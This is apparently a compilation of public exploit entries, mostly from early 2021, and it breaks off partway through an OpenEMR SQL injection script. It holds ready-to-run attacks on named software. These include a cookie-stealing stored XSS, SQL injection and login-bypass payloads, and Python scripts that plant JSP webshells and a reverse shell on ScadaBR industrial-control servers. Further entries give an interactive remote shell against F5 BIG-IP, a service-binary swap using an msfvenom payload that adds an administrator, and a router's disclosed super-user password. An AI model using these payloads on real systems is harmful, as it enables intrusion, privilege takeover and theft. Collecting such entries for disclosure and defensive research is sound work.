# Exploit Title: CourseMS 2.1 - 'name' Stored XSS # Date: 03/30/2021 # Exploit Author: cptsticky # Vendor Homepage: http://sourceforge.net/projects/coursems # Software Link: https://sourceforge.net/projects/coursems/files/latest/download # Version: 2.1 # Tested on: Ubuntu 20.04 POST /coursems/admin/add_jobs.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 91 Origin: http://localhost Connection: close Referer: http://localhost/coursems/admin/add_jobs.php Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) Upgrade-Insecure-Requests: 1 name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS
-
Latrix 0.6.0 - 'txtaccesscode' SQL Injection
# Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection # Date: 03/30/2021 # Exploit Author: cptsticky # Vendor Homepage: https://sourceforge.net/projects/latrix # Software Link: https://sourceforge.net/projects/latrix/files/latest/download # Version: 0.6.0 # Tested on: Ubuntu 20.04 POST /latrix/inandout.php HTTP/1.1 Host: 18.222.194.190 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 34 Origin: http://18.222.194.190 Connection: close Referer: http://18.222.194.190/latrix/inandoutcode.php?target=inandout Cookie: PHPSESSID=q9b6a0e050sl6jae7u64usvrs1 Upgrade-Insecure-Requests: 1 txtaccesscode=111&btnsubmit=Submit Command used to prove injection: sqlmap -r bam.txt -p txtaccesscode Output ----------------snip---------------- sqlmap resumed the following injection point(s) from stored session: --- Parameter: txtaccesscode (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: txtaccesscode=-3451' OR 7070=7070#&btnsubmit=Submit Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: txtaccesscode=111' AND GTID_SUBSET(CONCAT(0x716b627a71,(SELECT (ELT(2717=2717,1))),0x71786a7071),2717)-- GnJe&btnsubmit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: txtaccesscode=111' AND (SELECT 8547 FROM (SELECT(SLEEP(5)))qHfx)-- tljS&btnsubmit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 22 columns Payload: txtaccesscode=111' UNION ALL SELECT 
CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit --- [16:29:27] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 5.6
-
ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)
# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1) # Date: 03/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.scadabr.com.br/ # Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux # Tested on: Windows7, Windows10 #!/usr/bin/python import requests,sys,time if len(sys.argv) <=4: print('[x] Missing arguments ... ') print('[>] Usage: python WinScada_RCE.py <TargetIp> <TargetPort> <User> <Password>') print('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin') sys.exit(0) else: time.sleep(1) host = sys.argv[1] port = sys.argv[2] user = sys.argv[3] passw = sys.argv[4] flag = False LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ | _________ .___ ____________________ | | / _____/ ____ _____ __| _/____ \______ \______ \ | | \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ | | / \ \___ / __ \_/ /_/ | / __ \| | \| | \ | | /_______ /\___ >____ /\____ |(____ /______ /|____|_ / | | \/ \/ \/ \/ \/ \/ \/ | | | | > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload | | > Exploit Author : Fellipe Oliveira | | > Exploit for Windows Systems | +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ ''' def main(): payload = { 'username': user, 'password': passw } print(banner) time.sleep(2) with requests.session() as s: s.post(LOGIN, data=payload) response = s.get(PROTECTED_PAGE) print("[+] Trying to authenticate "+LOGIN+"...") if response.status_code == 200: print("[+] Successfully authenticated! 
:D~\n") time.sleep(2) else: print("[x] Authentication failed :(") sys.exit(0) burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm" burp0_cookies = {"JSESSIONID": "66E47DFC053393AFF6C2D5A7C15A9439"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6150838712847095098536245849", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_218627\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"win_cmd.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n%>\n<HTML><BODY>\nCommands with JSP\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n Process p;\n if ( System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n p = Runtime.getRuntime().exec(\"cmd.exe /C \" + request.getParameter(\"cmd\"));\n }\n else{\n p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n }\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n 
out.println(disr);\n disr = dis.readLine();\n }\n}\n%>\n</pre>\n</BODY></HTML>\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------6150838712847095098536245849--\r\n" getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print('[>] Attempting to upload .jsp Webshell...') time.sleep(1) print('[>] Verifying shell upload...\n') time.sleep(2) if getdata.status_code == 200: print('[+] Upload Successfuly!') for num in range(1,500): PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) find = s.get(PATH) if find.status_code == 200: print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) flag = True print('[>] Spawning fake shell...') time.sleep(3) while flag: param = raw_input("# ") burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s" % (num,param) burp0_cookies = {"JSESSIONID": "4FCC12402B8389A64905F4C8272A64B5"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s", "Upgrade-Insecure-Requests": "1"} send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) clean = send.text.replace('<pre>', '').replace('<FORM METHOD=', '').replace('<HTML><BODY>', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('<INPUT TYPE="text" NAME="cmd">', '').replace('<INPUT TYPE="submit" VALUE="Send">', '').replace('</FORM>', '').replace('<BR>', '').replace('</pre>', '').replace('</BODY></HTML>', '') 
print(clean) elif num == 499: print('[x] Webshell not Found') else: print('Reason:'+getdata.reason+' ') print('Exploit Failed x_x') if __name__ == '__main__': main()
-
phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)
# Exploit Title: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated) # Date: 29/03/2021 # Exploit Author: Valerio Severini # Vendor Homepage: Software Link: https://github.com/phppgadmin/phppgadmin/releases/tag/REL_7-13-0 # Version: 7.13.0 or lower # Tested on: Debian 10 and Ubuntu Description: phpPgAdmin through 7.13.0 allows remote authenticated users to execute arbitrary code. An attacker can create a table named cmd_exec with one column, add type=text and cmd_out, and try to execute the query via a SQL tab. It will fail because of restrictions on statements. However, the attacker can bypass this step by uploading a .txt file (containing a SQL statement such as "COPY cmd_exec FROM PROGRAM" followed by OS commands) in the Browse bar. This achieves remote command execution via a "SELECT * FROM cmd_exec" statement. Attack Vectors (PoC): 1) Create a table manually and call it "cmd_exec" with 1 column. 2) Add cmd_output and type = text. 3) Try to execute the query via the SQL tab; it fails because of the restrictions on statements. 4) An attacker can bypass this step by uploading a .txt file via the "Browse" bar with a malicious SQL query inside, for example: " COPY cmd_exec FROM PROGRAM 'id; cd /root; ls'; " 5) The attacker then achieves remote command execution and obtains full control by executing the SQL query: " SELECT * FROM cmd_exec; "
-
ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)
# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2) # Date: 04/21 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.scadabr.com.br/ # Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux # Tested on: Debian9,10~Ubuntu16.04 #!/usr/bin/python import requests,sys,time if len(sys.argv) <=6: print('[x] Missing arguments ... ') print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>') print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444') sys.exit(0) else: time.sleep(1) host = sys.argv[1] port = sys.argv[2] user = sys.argv[3] passw = sys.argv[4] rev_host = sys.argv[5] rev_port = sys.argv[6] flag = False LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ | _________ .___ ____________________ | | / _____/ ____ _____ __| _/____ \______ \______ \ | | \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ | | / \ \___ / __ \_/ /_/ | / __ \| | \| | \ | | /_______ /\___ >____ /\____ |(____ /______ /|____|_ / | | \/ \/ \/ \/ \/ \/ \/ | | | | > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload | | > Exploit Author : Fellipe Oliveira | | > Exploit for Linux Systems | +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ ''' def main(): payload = { 'username': user, 'password': passw } print(banner) time.sleep(2) with requests.session() as s: s.post(LOGIN, data=payload) response = s.get(PROTECTED_PAGE) print "[+] Trying to authenticate "+LOGIN+"..." if response.status_code == 200: print "[+] Successfully authenticated! 
:D~\n" time.sleep(2) else: print "[x] Authentication failed :(" sys.exit(0) burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm" burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n InputStream is;\n OutputStream os;\n StreamConnector(InputStream is, OutputStream os) {\n this.is = is;\n this.os = os;\n }\n public void run() {\n BufferedReader isr = null;\n BufferedWriter osw = null;\n try {\n isr = new BufferedReader(new InputStreamReader(is));\n osw = new BufferedWriter(new OutputStreamWriter(os));\n char buffer[] = new char[8192];\n int lenRead;\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n osw.write(buffer, 0, lenRead);\n osw.flush();\n }\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n try {\n if (isr != null)\n isr.close();\n if (osw != 
null)\n osw.close();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\n String ipAddress = request.getParameter(\"ipaddress\");\n String ipPort = request.getParameter(\"port\");\n Socket sock = null;\n Process proc = null;\n if (ipAddress != null && ipPort != null) {\n try {\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n System.out.println(\"socket created: \" + sock.toString());\n Runtime rt = Runtime.getRuntime();\n proc = rt.exec(\"/bin/bash\");\n System.out.println(\"process /bin/bash started: \" + proc.toString());\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n System.out.println(\"outputConnector created: \" + outputConnector.toString());\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n System.out.println(\"inputConnector created: \" + inputConnector.toString());\n outputConnector.start();\n inputConnector.start();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n if (sock != null && proc != null) {\n out.println(\"<div class='separator'></div>\");\n out.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; 
name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n" getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print('[>] Attempting to upload .jsp Webshell...') time.sleep(1) print('[>] Verifying shell upload...\n') time.sleep(2) if getdata.status_code == 200: print('[+] Upload Successfuly! \n') for num in range(1,1000): PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) find = s.get(PATH) if find.status_code == 200: print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) print('[>] Spawning Reverse Shell...\n') time.sleep(3) burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port) burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) time.sleep(5) if len(r.text) > 401: print('[+] Connection received') sys.exit(0) else: print('[x] Failed to receive reverse connection ...\n') elif num == 999: print('[x] Failed to found Webshell ... ') else: print('Reason:'+getdata.reason+' ') print('Exploit Failed x_x') if __name__ == '__main__': main()
-
ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation # Date: 31.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND)) Product web page: http://www.zblchina.com | http://www.wd-thailand.com Affected version: Firmware: V100R001 Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE EONU Hardware Version V3.0 Software: V2.46.02P6T5S Main Chip: RTL9607 Master Controller, Copyright (c) R&D Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband router. Desc: The application suffers from a privilege escalation vulnerability. The limited administrative user (admin:admin) can elevate his/her privileges by sending an HTTP GET request to the configuration backup endpoint or the password page, disclosing the HTTP super-user password. Once authenticated as super, an attacker is granted access to additional, privileged functionality.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5467 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php 31.01.2021 -- Get config file and disclose super pwd: --------------------------------------- POST /HG104B-ZG-E.config HTTP/1.1 Host: 192.168.1.1 Connection: keep-alive Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://192.168.1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://192.168.1.1/system_configure.asp Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files= ... #web_1 user_web_name=super user_web_password=www168nettv ... Disclose super pwd from system pwd page: ---------------------------------------- GET /system_password.asp Host: 192.168.1.1 ... var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2'); var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin'); ...
-
Rockstar Service - Insecure File Permissions
# Exploit Title: Rockstar Service - Insecure File Permissions # Date: 2020-04-02 # Exploit Author: George Tsimpidas # Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher # Version Patch: 1.0.37.349 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 Vulnerability Description: RockstarService.exe suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to replace the existing executable file of the service with a binary of their choice. The vulnerability exists because a weak set of permissions is granted to the "Authenticated Users" group, including the (M) flag, i.e. "Modify" permission. #PoC D:\Launcher> icacls .\Launcher.exe .\Launcher.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\Authenticated Users:(I)(M) BUILTIN\Users:(I)(RX) #1. Create low privileged user & Login to that user C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the RockstarService.exe to a new name D:\Launcher> move RockstarService.exe RockstarService.exe.bk 1 file(s) moved. #3. Create malicious binary on kali linux with MSF msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe #4. Transfer created 'RockstarService.exe' to the Windows Host #5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one #6. Now start the Service Command : net start 'Rockstar Service' Now verify that the user has been created on the system and added to the local Administrators group C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None
-
F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) # Exploit Author: Al1ex # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 # CVE : CVE-2021-22986 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import sys def title(): print(''' ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ / |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / / | ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ | | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \ | `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/ Author:Al1ex@Heptagram Github:https://github.com/Al1ex ''') def exploit(url): target_url = url + '/mgmt/shared/authn/login' data = { "bigipAuthCookie":"", "username":"admin", "loginReference":{"link":"/shared/gossip"}, "userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"} } headers = { "User-Agent": "hello-world", "Content-Type":"application/x-www-form-urlencoded" } response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15) if "/mgmt/shared/authz/tokens/" not in response.text: print('(-) Get token fail !!!') print('(*) Tested Method 2:') header_2 = { 'User-Agent': 'hello-world', 'Content-Type': 'application/json', 'X-F5-Auth-Token': '', 'Authorization': 'Basic YWRtaW46QVNhc1M=' } data_2 = { "command": "run", "utilCmdArgs": "-c whoami" } check_url = url + '/mgmt/tm/util/bash' try: response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20) if response2.status_code == 200 
and 'commandResult' in response2.text: while True: cmd = input("(:CMD)> ") data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)} r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False) if r.status_code == 200 and 'commandResult' in r.text: print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) else: print('(-) Not vuln...') exit(0) except Exception: print('ERROR Connect') print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])) while True: cmd = input("(:CMD)> ") headers = { "Content-Type": "application/json", "X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]) } data_json = { "command": "run", "utilCmdArgs": "-c \'%s\'"%(cmd) } exp_url= url + '/mgmt/tm/util/bash' exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15) if exp_req.status_code == 200 and 'commandResult' in exp_req.text: print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) else: print('(-) Not vuln...') exit(0) if __name__ == '__main__': title() if(len(sys.argv) < 2): print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1])
-
Simple Food Website 1.0 - Authentication Bypass
# Exploit Title: Simple Food Website 1.0 - Authentication Bypass # Date: 2021-04-03 # Exploit Author: Viren Saroha (illusion) # Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux POC Step 1 - Go to url http://localhost/food/admin/login.php Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in burpsuite Step 4 – Change the username to ' or '1'='1'# Step 5 – Click forward and now you will be logged in as admin. REQUEST POST /food/admin/process_login.php HTTP/1.1 Host: 192.168.132.128 Content-Length: 76 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.132.128 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.132.128/food/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=44189551c332ee92a95246aac0756dd3 Connection: close username=%27+or+%271%27%3D%271%27%23&password=randomPassword&Sign+In=Sign+In
-
Basic Shopping Cart 1.0 - Authentication Bypass
# Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass # Date: 2021-04-03 # Exploit Author: Viren Saroha (illusion) # Vendor Homepage: https://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=10964&title=Basic+Shopping+Cart+using+PHP%2FMySQL+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux POC Step 1 - Go to url http://localhost/EdgeSketch/index.php and Click on Admin Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in burpsuite Step 4 – Change the username to ' or '1'='1'# Step 5 – Click forward and now you will be logged in as admin. REQUEST POST /EdgeSketch/adminlogin.php HTTP/1.1 Host: localhost Content-Length: 77 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/EdgeSketch/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6b7072bb40c321cb336aacef057a0876 Connection: close admin_username=%27+or+%271%27%3D%271%27%23&admin_password=random&admin_login=
-
OpenEMR 4.1.0 - 'u' SQL Injection
# Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection # Date: 2021-04-03 # Exploit Author: Michael Ikua # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip # Version: 4.1.0 # Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/ #!/usr/bin/env python3 import requests import string import sys print(""" ____ ________ _______ __ __ ___ ____ / __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \\ / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / / / /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ / \____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/ /_/ ____ ___ __ _____ ____ __ _ / __ )/ (_)___ ____/ / / ___// __ \ / / (_) / /_/ / / / __ \/ __ / \__ \/ / / / / / / / / /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ / /_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike """) all = string.printable # edit url to point to your openemr instance url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u=" def extract_users_num(): print("[+] Finding number of users...") for n in range(1,100): payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\'' r = 